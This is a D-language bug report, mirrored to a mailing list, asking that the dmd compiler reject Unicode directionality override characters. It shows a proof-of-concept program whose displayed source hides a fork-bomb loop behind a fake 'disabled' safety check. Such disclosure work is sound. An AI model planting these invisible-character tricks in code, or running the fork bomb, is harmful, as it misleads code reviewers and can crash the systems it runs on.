digitalmars.D.bugs - [Issue 22495] New: SECURITY: unicode directionality overrides should

d-bugmail puremagic.com (50/50) Nov 08 2021 https://issues.dlang.org/show_bug.cgi?id=22495

https://issues.dlang.org/show_bug.cgi?id=22495

          Issue ID: 22495
           Summary: SECURITY: unicode directionality overrides should be
                    rejected
           Product: D
           Version: D2
          Hardware: All
                OS: All
            Status: NEW
          Severity: blocker
          Priority: P1
         Component: dmd
          Assignee: nobody puremagic.com
          Reporter: Ajieskola gmail.com

Read:
https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html

Demonstration (for Unix systems) that the vulnerability affects the D
compilers:

------------------
import std;

auto exploit =
"import core.sys.posix.unistd;
enum mode = \"safe\";
 safe void main(){
if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\")
  while(fork()){};
}";

 safe void main()
{ File("payload.d", "w").writeln(exploit);
}
------------------

When run, this file generates a program that looks like 

----------
import core.sys.posix.unistd;
enum mode = "safe";
 safe void main(){
if (mode != "safe") // Check if safe ( disabled )
  while(fork()){};
}
----------

But compiles like

----------
import core.sys.posix.unistd;
enum mode = "safe";
 safe void main(){
if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066")
  while(fork()){};
}
----------

--

Nov 08 2021

D Programming

C/C++ Programming

Other

digitalmars.D.bugs - [Issue 22495] New: SECURITY: unicode directionality overrides should